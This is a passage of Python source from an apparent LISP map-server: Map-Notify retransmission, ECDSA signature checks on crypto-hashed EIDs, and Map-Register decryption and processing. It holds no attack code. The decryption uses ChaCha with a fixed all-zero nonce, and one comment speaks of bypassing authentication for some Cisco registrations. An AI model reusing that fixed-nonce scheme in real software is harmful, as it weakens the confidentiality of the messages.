        key = map_notify.nonce_key
        if (lisp_map_notify_queue.has_key(key)):
            map_notify.retransmit_timer.cancel()
            lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
                format(key))
            try:
                lisp_map_notify_queue.pop(key)
            except:
                lprint("Key not found in Map-Notify queue")
            #endtry
        #endif
        return
    #endif
    lisp_sockets = map_notify.lisp_sockets
    map_notify.retry_count += 1
    lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
        bold("Map-Notify", False), map_notify.nonce_key,
        red(dest.print_address(), False), map_notify.retry_count))
    lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
    if (map_notify.site): map_notify.site.map_notifies_sent += 1
    #
    # Restart retransmit timer.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
    eid_record):
    '''
    Send a Map-Notify carrying the merged RLOC-set of 'parent' to every
    ETR in that RLOC-set. Each Map-Notify is authenticated with the site
    key and queued for retransmission until acknowledged.
    '''
    #
    # Build EID-record once.
    #
    eid_record.rloc_count = len(parent.registered_rlocs)
    packet_record = eid_record.encode()
    eid_record.print_record("Merged Map-Notify ", False)
    #
    # Build RLOC-records for merged RLOC-set.
    #
    for xtr in parent.registered_rlocs:
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(xtr)
        packet_record += rloc_record.encode()
        rloc_record.print_record(" ")
        del(rloc_record)
    #endfor
    #
    # Build Map-Notify for each xTR that needs to receive the Map-Notify.
    #
    for xtr in parent.registered_rlocs:
        dest = xtr.rloc
        map_notify = lisp_map_notify(lisp_sockets)
        map_notify.record_count = 1
        key_id = map_register.key_id
        map_notify.key_id = key_id
        map_notify.alg_id = map_register.alg_id
        map_notify.auth_len = map_register.auth_len
        map_notify.nonce = map_register.nonce
        map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
        map_notify.etr.copy_address(dest)
        map_notify.etr_port = map_register.sport
        map_notify.site = parent.site
        packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
        map_notify.print_notify()
        #
        # Put Map-Notify state on retransmission queue. Cancel and replace
        # any entry already pending under the same nonce key.
        #
        key = map_notify.nonce_key
        if (lisp_map_notify_queue.has_key(key)):
            remove = lisp_map_notify_queue[key]
            remove.retransmit_timer.cancel()
            del(remove)
        #endif
        lisp_map_notify_queue[key] = map_notify
        #
        # Send out.
        #
        lprint("Send merged Map-Notify to ETR {}".format( \
            red(dest.print_address(), False)))
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
        parent.site.map_notifies_sent += 1
        #
        # Set retransmit timer.
        #
        map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
            lisp_retransmit_map_notify, [map_notify])
        map_notify.retransmit_timer.start()
    #endfor
    return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
    source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
    '''
    Build, queue, and send the first Map-Notify for a Map-Register. When
    map_register_ack is True this is a plain acknowledgement and no
    retransmission state is kept; otherwise the entry is queued and the
    retransmit timer armed.
    '''
    key = lisp_hex_string(nonce) + source.print_address()
    #
    # If we are already sending Map-Notifies for the 2-tuple, no need to
    # queue an entry and send one out. Let the retransmission timer trigger
    # the sending.
    #
    lisp_remove_eid_from_map_notify_queue(eid_list)
    if (lisp_map_notify_queue.has_key(key)):
        map_notify = lisp_map_notify_queue[key]
        s = red(source.print_address_no_iid(), False)
        lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
            lisp_hex_string(map_notify.nonce), s))
        return
    #endif
    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = record_count
    # NOTE(review): the self-assignment below is a no-op and looks like a
    # leftover -- confirm against revision history before removing.
    key_id = key_id
    map_notify.key_id = key_id
    map_notify.alg_id = alg_id
    map_notify.auth_len = auth_len
    map_notify.nonce = nonce
    map_notify.nonce_key = lisp_hex_string(nonce)
    map_notify.etr.copy_address(source)
    map_notify.etr_port = port
    map_notify.site = site
    map_notify.eid_list = eid_list
    #
    # Put Map-Notify state on retransmission queue.
    #
    if (map_register_ack == False):
        key = map_notify.nonce_key
        lisp_map_notify_queue[key] = map_notify
    #endif
    if (map_register_ack):
        lprint("Send Map-Notify to ack Map-Register")
    else:
        lprint("Send Map-Notify for RLOC-set change")
    #endif
    #
    # Build packet and copy EID records from Map-Register.
    #
    packet = map_notify.encode(eid_records, site.auth_key[key_id])
    map_notify.print_notify()
    if (map_register_ack == False):
        eid_record = lisp_eid_record()
        eid_record.decode(eid_records)
        eid_record.print_record(" ", False)
    #endif
    #
    # Send out.
    #
    lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
    site.map_notifies_sent += 1
    if (map_register_ack): return
    #
    # Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
    # we are acknowledging a Map-Register and the registerer is not going
    # to send a Map-Notify-Ack so we shouldn't expect one.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
    '''
    Turn a received Map-Notify into a Map-Notify-Ack, re-authenticate it
    with the map-server's password, and send it back to the map-server.
    '''
    map_notify.map_notify_ack = True
    #
    # Re-encode (and re-authenticate) the message with the ack type set,
    # carrying the same EID records.
    #
    ack_packet = map_notify.encode(eid_records, ms.password)
    map_notify.print_notify()
    #
    # Ship it back to the map-server on the LISP control port.
    #
    map_server_address = ms.map_server
    lprint("Send Map-Notify-Ack to {}".format(
        red(map_server_address.print_address(), False)))
    lisp_send(lisp_sockets, map_server_address, LISP_CTRL_PORT, ack_packet)
    return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
    '''
    Send a Map-Notify for the supplied (S,G) site-EID to one xTR, queueing
    it for retransmission. When RTRs are present in the registered
    RLOC-set (and 'xtr' is not itself one of them), only RTR RLOCs are
    advertised; otherwise only non-RTR RLOCs are.
    '''
    map_notify = lisp_map_notify(lisp_sockets)
    map_notify.record_count = 1
    map_notify.nonce = lisp_get_control_nonce()
    map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
    map_notify.etr.copy_address(xtr)
    map_notify.etr_port = LISP_CTRL_PORT
    map_notify.eid_list = eid_list
    key = map_notify.nonce_key
    #
    # If we are already sending Map-Notifies for the 2-tuple, no need to
    # queue an entry and send one out. Let the retransmission timer trigger
    # the sending.
    #
    lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
    if (lisp_map_notify_queue.has_key(key)):
        map_notify = lisp_map_notify_queue[key]
        lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
            map_notify.nonce, red(xtr.print_address_no_iid(), False)))
        return
    #endif
    #
    # Put Map-Notify state on retransmission queue.
    #
    lisp_map_notify_queue[key] = map_notify
    #
    # Determine if there are any RTRs in the RLOC-set for this (S,G).
    # An RTR destination gets the non-RTR set (rtrs_exist forced False).
    #
    rtrs_exist = site_eid.rtrs_in_rloc_set()
    if (rtrs_exist):
        if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
    #endif
    #
    # Build EID-record. The XOR filter below keeps RTR RLOCs when
    # rtrs_exist is True and non-RTR RLOCs when it is False.
    #
    eid_record = lisp_eid_record()
    eid_record.record_ttl = 1440
    eid_record.eid.copy_address(site_eid.eid)
    eid_record.group.copy_address(site_eid.group)
    eid_record.rloc_count = 0
    for rloc_entry in site_eid.registered_rlocs:
        if (rtrs_exist ^ rloc_entry.is_rtr()): continue
        eid_record.rloc_count += 1
    #endfor
    packet = eid_record.encode()
    #
    # Print contents of Map-Notify.
    #
    map_notify.print_notify()
    eid_record.print_record(" ", False)
    #
    # Build locator-set with only RTR RLOCs if they exist.
    #
    for rloc_entry in site_eid.registered_rlocs:
        if (rtrs_exist ^ rloc_entry.is_rtr()): continue
        rloc_record = lisp_rloc_record()
        rloc_record.store_rloc_entry(rloc_entry)
        packet += rloc_record.encode()
        rloc_record.print_record(" ")
    #endfor
    #
    # Encode it.
    #
    packet = map_notify.encode(packet, "")
    if (packet == None): return
    #
    # Send Map-Notify to xtR.
    #
    lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
    #
    # Set retransmit timer.
    #
    map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
        lisp_retransmit_map_notify, [map_notify])
    map_notify.retransmit_timer.start()
    return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This function will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
    '''
    For each (S,G) in rle_list, work out which xTRs need a multicast
    Map-Notify -- RTRs registered for the (S,G), otherwise the ITRs of the
    source site (or all RLE nodes for a (*,G) entry) -- and send one to
    each via lisp_send_multicast_map_notify().
    '''
    null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
    for sg in rle_list:
        sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
        if (sg_site_eid == None): continue
        #
        # (S,G) RLOC-set could be empty when last RLE goes away. We will have
        # to search all individual registrations searching for RTRs.
        #
        # We store in a dictionary array so we can remove duplicates.
        #
        sg_rloc_set = sg_site_eid.registered_rlocs
        if (len(sg_rloc_set) == 0):
            temp_set = {}
            for se in sg_site_eid.individual_registrations.values():
                for rloc_entry in se.registered_rlocs:
                    if (rloc_entry.is_rtr() == False): continue
                    temp_set[rloc_entry.rloc.print_address()] = rloc_entry
                #endfor
            #endfor
            sg_rloc_set = temp_set.values()
        #endif
        #
        # If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
        # to all members (all RLOCs in the sg_rloc_set.
        #
        notify = []
        found_rtrs = False
        if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
            notify_str = []
            rle_nodes = []
            if (len(sg_rloc_set) != 0 and sg_rloc_set[0].rle != None):
                rle_nodes = sg_rloc_set[0].rle.rle_nodes
            #endif
            for rle_node in rle_nodes:
                notify.append(rle_node.address)
                notify_str.append(rle_node.address.print_address_no_iid())
            #endfor
            lprint("Notify existing RLE-nodes {}".format(notify_str))
        else:
            #
            # If the (S,G) has an RTR registered, then we will send a
            # Map-Notify to the RTR instead the ITRs of the source-site.
            #
            for rloc_entry in sg_rloc_set:
                if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
            #endfor
            #
            # If no RTRs were found, get ITRs from source-site.
            #
            found_rtrs = (len(notify) != 0)
            if (found_rtrs == False):
                site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
                if (site_eid == None): continue
                for rloc_entry in site_eid.registered_rlocs:
                    if (rloc_entry.rloc.is_null()): continue
                    notify.append(rloc_entry.rloc)
                #endfor
            #endif
            #
            # No ITRs or RTRs found.
            #
            if (len(notify) == 0):
                lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
                    format(green(sg_site_eid.print_eid_tuple(), False)))
                continue
            #endif
        #endif
        #
        # Send multicast Map-Notify to either ITR-list or RTR-list.
        #
        for xtr in notify:
            lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
                found_rtrs else "x", red(xtr.print_address_no_iid(), False),
                green(sg_site_eid.print_eid_tuple(), False)))
            el = [sg_site_eid.print_eid_tuple()]
            lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
            time.sleep(.001)
        #endfor
    #endfor
    return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
    '''
    Scan the RLOC-records in 'packet' for a JSON record containing a
    "signature" key. Returns that lisp_rloc_record(), or None when no
    RLOC-record carries a signature.
    '''
    for _ in range(rloc_count):
        rloc_record = lisp_rloc_record()
        packet = rloc_record.decode(packet, None)
        json_blob = rloc_record.json
        if (json_blob == None): continue
        #
        # Parse the JSON payload; skip records that do not parse.
        #
        try:
            parsed = json.loads(json_blob.json_string)
        except:
            lprint("Found corrupted JSON signature")
            continue
        #endtry
        if ("signature" in parsed): return(rloc_record)
    #endfor
    return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
    '''
    Return the crypto-hash portion of an IPv6 CGA-based EID as a string of
    colon-separated hex groups, or None when the EID does not match any
    configured prefix in lisp_eid_hashes[]. An instance-id of -1 on a
    configured prefix wildcards the instance-id.
    '''
    hash_mask_len = None
    for eid_prefix in lisp_eid_hashes:
        #
        # For wildcarding the instance-ID.
        #
        iid = eid_prefix.instance_id
        if (iid == -1): eid_prefix.instance_id = eid.instance_id
        ms = eid.is_more_specific(eid_prefix)
        eid_prefix.instance_id = iid
        if (ms):
            hash_mask_len = 128 - eid_prefix.mask_len
            break
        #endif
    #endfor
    if (hash_mask_len == None): return(None)
    #
    # Extract the low-order hash_mask_len bits 16 at a time, building the
    # string right-to-left. NOTE(review): hex(addr)[2:-1] assumes a
    # Python-2 long (it strips the trailing 'L'); under Python 3 it would
    # drop a hex digit -- confirm before porting.
    #
    address = eid.address
    eid_hash = ""
    for i in range(0, hash_mask_len / 16):
        addr = address & 0xffff
        addr = hex(addr)[2:-1]
        eid_hash = addr.zfill(4) + ":" + eid_hash
        address >>= 16
    #endfor
    #
    # A non-multiple-of-16 remainder is emitted as one byte (address & 0xff),
    # matching the 120-bit example in the function header.
    #
    if (hash_mask_len % 16 != 0):
        addr = address & 0xff
        addr = hex(addr)[2:-1]
        eid_hash = addr.zfill(2) + ":" + eid_hash
    #endif
    # Strip the trailing ":" left by the right-to-left construction.
    return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
    '''
    Given an EID, look up the distinguished-name EID 'hash-<cga-hash>' in
    the site cache (same instance-id) and pull the public-key out of a
    registered JSON RLOC-record.

    Returns [hash_eid, pubkey, lookup_good]: any value may be None, and
    lookup_good says whether the hash EID itself was found.
    '''
    iid = eid.instance_id
    #
    # Parse out the CGA hash; non-crypto EIDs have no public key to find.
    #
    pubkey_hash = lisp_get_eid_hash(eid)
    if (pubkey_hash == None): return([None, None, False])
    pubkey_hash = "hash-" + pubkey_hash
    hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
    group = lisp_address(LISP_AFI_NONE, "", 0, iid)
    #
    # Do lookup in local instance-ID.
    #
    site_eid = lisp_site_eid_lookup(hash_eid, group, True)
    if (site_eid == None): return([hash_eid, None, False])
    #
    # Walk registered RLOCs for a JSON record with a "public-key" field.
    #
    for rloc in site_eid.registered_rlocs:
        if (rloc.json == None): continue
        try:
            record = json.loads(rloc.json.json_string)
        except:
            lprint("Registered RLOC JSON format is invalid for {}".format( \
                pubkey_hash))
            return([hash_eid, None, False])
        #endtry
        if ("public-key" in record):
            return([hash_eid, record["public-key"], True])
        #endif
    #endfor
    #
    # Hash EID registered but no RLOC carried a public-key.
    #
    return([hash_eid, None, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
    """Verify the ECDSA signature in JSON RLOC-record 'rloc_record' for
    crypto-EID (or explicit signature-EID) 'eid'.

    The public key is fetched from the local mapping database (same
    instance-ID) via lisp_lookup_public_key(). Returns True only when the
    key exists and the signature verifies over the string "[<iid>]<eid>".
    """
    #
    # Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
    # EID.
    #
    sig = json.loads(rloc_record.json.json_string)
    if (lisp_get_eid_hash(eid)):
        sig_eid = eid
    elif (sig.has_key("signature-eid")):
        sig_eid_str = sig["signature-eid"]
        sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
    else:
        lprint(" No signature-eid found in RLOC-record")
        return(False)
    #endif

    #
    # Lookup CGA hash in mapping database to get public-key.
    #
    hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
    if (hash_eid == None):
        eid_str = green(sig_eid.print_address(), False)
        lprint(" Could not parse hash in EID {}".format(eid_str))
        return(False)
    #endif

    found = "found" if lookup_good else bold("not found", False)
    eid_str = green(hash_eid.print_address(), False)
    lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
    if (lookup_good == False): return(False)

    if (pubkey == None):
        lprint(" RLOC-record with public-key not found")
        return(False)
    #endif
    pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
    lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))

    #
    # Get signature from RLOC-record in a form to let key.verify() do its
    # thing.
    #
    sig_str = sig["signature"]
    try:
        sig = binascii.a2b_base64(sig_str)
    except:
        lprint(" Incorrect padding in signature string")
        return(False)
    #endtry

    # Only evenness is sanity-checked here; curve-length validation is left
    # to key.verify() below.
    sig_len = len(sig)
    if (sig_len & 1):
        lprint(" Signature length is odd, length {}".format(sig_len))
        return(False)
    #endif

    #
    # The signature is over the following string: "[<iid>]<eid>".
    #
    sig_data = sig_eid.print_address()

    #
    # Verify signature of CGA and public-key.
    #
    pubkey = binascii.a2b_base64(pubkey)
    try:
        key = ecdsa.VerifyingKey.from_pem(pubkey)
    except:
        bad = bold("Bad public-key", False)
        lprint(" {}, not in PEM format".format(bad))
        return(False)
    #endtry

    #
    # The hashfunc must be supplied to get signature interoperability between
    # a Go signer and a Python verifier. The signature data must go through
    # a sha256 hash first. Python signer must use:
    #
    # ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
    #
    # Note to use sha256 you need a curve of NIST256p.
    #
    try:
        good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
    except:
        lprint(" Signature library failed for signature data '{}'".format( \
            sig_data))
        lprint(" Signature used '{}'".format(sig_str))
        return(False)
    #endtry
    return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
    """Remove from the Map-Notify retransmission queue every queued
    Map-Notify whose EID-list intersects 'eid_list', cancelling its
    retransmit timer. Queue keys are the concatenation of the xTR address
    and the Map-Notify nonce.
    """
    #
    # Determine from the supplied EID-list, if any EID is in any EID-list of
    # a queued Map-Notify.
    #
    keys_to_remove = []
    for eid_tuple in eid_list:
        for mn_key in lisp_map_notify_queue:
            map_notify = lisp_map_notify_queue[mn_key]
            if (eid_tuple not in map_notify.eid_list): continue

            keys_to_remove.append(mn_key)
            timer = map_notify.retransmit_timer
            if (timer): timer.cancel()

            lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
                format(map_notify.nonce_key, green(eid_tuple, False)))
        #endfor
    #endfor

    #
    # Now remove keys that were determined to be removed. The same queue key
    # can appear more than once in keys_to_remove when several entries of
    # 'eid_list' sit in one Map-Notify's EID-list, so pop with a default to
    # avoid a KeyError on the duplicate removal (bug fix: bare pop raised).
    #
    for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key, None)
    return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
    """Return 'packet' unchanged when it is not encrypted, a decrypted
    Map-Register when it is, or None when no key is configured for the
    key-id found in the header.
    """
    #
    # The first 4 bytes are never encrypted; the e-bit says whether the
    # rest of the packet is, and the 3 bits above it select the key.
    #
    first_word = socket.ntohl(struct.unpack("I", packet[0:4])[0])
    is_encrypted = (first_word >> 13) & 0x1
    if (is_encrypted == 0): return(packet)

    key_id = (first_word >> 14) & 0x7

    #
    # Use 16-byte key which is 32 string characters.
    #
    try:
        chacha_key = lisp_ms_encryption_keys[key_id].zfill(32)
        nonce = "0" * 8
    except:
        lprint("Cannot decrypt Map-Register with key-id {}".format(key_id))
        return(None)
    #endtry

    lprint("{} Map-Register with key-id {}".format(bold("Decrypt", False),
        key_id))

    #
    # Everything after the fixed 4-byte header is ciphertext.
    #
    cleartext = chacha.ChaCha(chacha_key, nonce).decrypt(packet[4::])
    return(packet[0:4] + cleartext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
    """Process a received Map-Register on the Map-Server.

    Decrypts (if needed) and decodes the message, then for each EID-record:
    finds or creates the site entry, verifies authentication and (for
    crypto-EIDs) the CGA signature, stores the registered RLOC-set, and
    sends Map-Notify messages where required. 'source' is the outer packet
    source address; 'sport' its UDP source port.
    """
    global lisp_registered_count

    #
    # First check if we are expecting an encrypted Map-Register. This call
    # will either return a unencrypted packet, a decrypted packet, or None
    # if the key-id from the Map-Register is not registered.
    #
    packet = lisp_decrypt_map_register(packet)
    if (packet == None): return

    map_register = lisp_map_register()
    orig_packet, packet = map_register.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Register packet")
        return
    #endif
    map_register.sport = sport

    map_register.print_map_register()

    #
    # Verify that authentication parameters are consistent.
    #
    sha1_or_sha2 = True
    if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
        sha1_or_sha2 = True
    #endif
    if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
        sha1_or_sha2 = False
    #endif

    #
    # For tracking which (S,G) RLEs have changed.
    #
    rle_list = []

    #
    # Process each EID record in Map-Register message.
    #
    site = None
    start_eid_records = packet
    eid_list = []
    record_count = map_register.record_count
    for i in range(record_count):
        eid_record = lisp_eid_record()
        rloc_record = lisp_rloc_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Register packet")
            return
        #endif
        eid_record.print_record(" ", False)

        #
        # Lookup lisp_site entry.
        #
        site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
            False)

        match_str = site_eid.print_eid_tuple() if site_eid else None

        #
        # Allowing overlapping ams registered prefixes. Make sure we get the
        # configured parent entry and not the registered more-specific. This
        # registration could be a more-specific of the registered more-specific
        # entry.
        #
        if (site_eid and site_eid.accept_more_specifics == False):
            if (site_eid.eid_record_matches(eid_record) == False):
                parent = site_eid.parent_for_more_specifics
                if (parent): site_eid = parent
            #endif
        #endif

        #
        # Check if this is a new more-specific EID-prefix registration that
        # will match a static configured site-eid with "accept-more-specifics"
        # configured.
        #
        ams = (site_eid and site_eid.accept_more_specifics)
        if (ams):
            ms_site_eid = lisp_site_eid(site_eid.site)
            ms_site_eid.dynamic = True
            ms_site_eid.eid.copy_address(eid_record.eid)
            ms_site_eid.group.copy_address(eid_record.group)
            ms_site_eid.parent_for_more_specifics = site_eid
            ms_site_eid.add_cache()
            ms_site_eid.inherit_from_ams_parent()
            site_eid.more_specific_registrations.append(ms_site_eid)
            site_eid = ms_site_eid
        else:
            site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
                True)
        #endif

        eid_str = eid_record.print_eid_tuple()

        if (site_eid == None):
            notfound = bold("Site not found", False)
            lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
                ", matched non-ams {}".format(green(match_str, False) if \
                match_str else "")))

            #
            # Need to hop over RLOC-set so we can get to the next EID-record.
            #
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            if (packet == None):
                lprint(" Could not decode RLOC-record in Map-Register packet")
                return
            #endif
            continue
        #endif

        site = site_eid.site

        if (ams):
            e = site_eid.parent_for_more_specifics.print_eid_tuple()
            lprint(" Found ams {} for site '{}' for registering prefix {}". \
                format(green(e, False), site.site_name, green(eid_str, False)))
        else:
            e = green(site_eid.print_eid_tuple(), False)
            lprint(" Found {} for site '{}' for registering prefix {}". \
                format(e, site.site_name, green(eid_str, False)))
        #endif

        #
        # Check if site configured in admin-shutdown mode.
        #
        if (site.shutdown):
            lprint((" Rejecting registration for site '{}', configured in " +
                "admin-shutdown state").format(site.site_name))
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            continue
        #endif

        #
        # Verify authentication before processing locator-set. Quick hack
        # while I figure out why sha1 and sha2 authentication is not working
        # from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
        # to use this to bypass the authentication check.
        #
        key_id = map_register.key_id
        if (site.auth_key.has_key(key_id)):
            password = site.auth_key[key_id]
        else:
            password = ""
        #endif

        auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
            map_register.auth_data, password)
        dynamic = "dynamic " if site_eid.dynamic else ""

        passfail = bold("passed" if auth_good else "failed", False)
        key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
            else "bad key-id {}".format(map_register.key_id)
        lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
            passfail, dynamic, green(eid_str, False), key_id))

        #
        # If the IPv6 EID is a CGA, verify signature if it exists in an
        # RLOC-record.
        #
        cga_good = True
        is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
        if (is_crypto_eid or site_eid.require_signature):
            required = "Required " if site_eid.require_signature else ""
            eid_str = green(eid_str, False)
            rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
            if (rloc == None):
                cga_good = False
                lprint((" {}EID-crypto-hash signature verification {} " + \
                    "for EID-prefix {}, no signature found").format(required,
                    bold("failed", False), eid_str))
            else:
                cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
                passfail = bold("passed" if cga_good else "failed", False)
                lprint((" {}EID-crypto-hash signature verification {} " + \
                    "for EID-prefix {}").format(required, passfail, eid_str))
            #endif
        #endif

        if (auth_good == False or cga_good == False):
            # Skip this EID-record's RLOC-set and move to the next record.
            packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
            if (packet == None):
                lprint(" Could not decode RLOC-record in Map-Register packet")
                return
            #endif
            continue
        #endif

        #
        # If merge being requested get individual site-eid. If not, and what
        # was cached had merge bit set, set flag to issue error.
        #
        if (map_register.merge_register_requested):
            parent = site_eid
            parent.inconsistent_registration = False

            #
            # Clear out all registrations, there is a new site-id registering.
            # Or there can be multiple sites registering for a multicast (S,G).
            #
            if (site_eid.group.is_null()):
                if (parent.site_id != map_register.site_id):
                    parent.site_id = map_register.site_id
                    parent.registered = False
                    parent.individual_registrations = {}
                    parent.registered_rlocs = []
                    lisp_registered_count -= 1
                #endif
            #endif

            key = source.address + map_register.xtr_id
            if (site_eid.individual_registrations.has_key(key)):
                site_eid = site_eid.individual_registrations[key]
            else:
                site_eid = lisp_site_eid(site)
                site_eid.eid.copy_address(parent.eid)
                site_eid.group.copy_address(parent.group)
                parent.individual_registrations[key] = site_eid
            #endif
        else:
            site_eid.inconsistent_registration = \
                site_eid.merge_register_requested
        #endif

        site_eid.map_registers_received += 1

        #
        # If TTL is 0, unregister entry if source of Map-Reqister is in the
        # list of currently registered RLOCs.
        #
        bad = (site_eid.is_rloc_in_rloc_set(source) == False)
        if (eid_record.record_ttl == 0 and bad):
            lprint(" Ignore deregistration request from {}".format( \
                red(source.print_address_no_iid(), False)))
            continue
        #endif

        #
        # Clear out previously stored RLOCs. Put new ones in if validated
        # against configured ones.
        #
        previous_rlocs = site_eid.registered_rlocs
        site_eid.registered_rlocs = []

        #
        # Process each RLOC record in EID record.
        #
        start_rloc_records = packet
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            packet = rloc_record.decode(packet, None)
            if (packet == None):
                lprint(" Could not decode RLOC-record in Map-Register packet")
                return
            #endif
            rloc_record.print_record(" ")

            #
            # Run RLOC in Map-Register against configured RLOC policies.
            #
            if (len(site.allowed_rlocs) > 0):
                addr_str = rloc_record.rloc.print_address()
                if (site.allowed_rlocs.has_key(addr_str) == False):
                    lprint((" Reject registration, RLOC {} not " + \
                        "configured in allowed RLOC-set").format( \
                        red(addr_str, False)))

                    site_eid.registered = False
                    packet = rloc_record.end_of_rlocs(packet,
                        eid_record.rloc_count - j - 1)
                    break
                #endif
            #endif

            #
            # RLOC validated good. Otherwise, go to next EID record
            #
            rloc = lisp_rloc()
            rloc.store_rloc_from_record(rloc_record, None, source)

            #
            # If the source of the Map-Register is in the locator-set, then
            # store if it wants Map-Notify messages when a new locator-set
            # is registered later.
            #
            if (source.is_exact_match(rloc.rloc)):
                rloc.map_notify_requested = map_register.map_notify_requested
            #endif

            #
            # Add to RLOC set for site-eid.
            #
            site_eid.registered_rlocs.append(rloc)
        #endfor

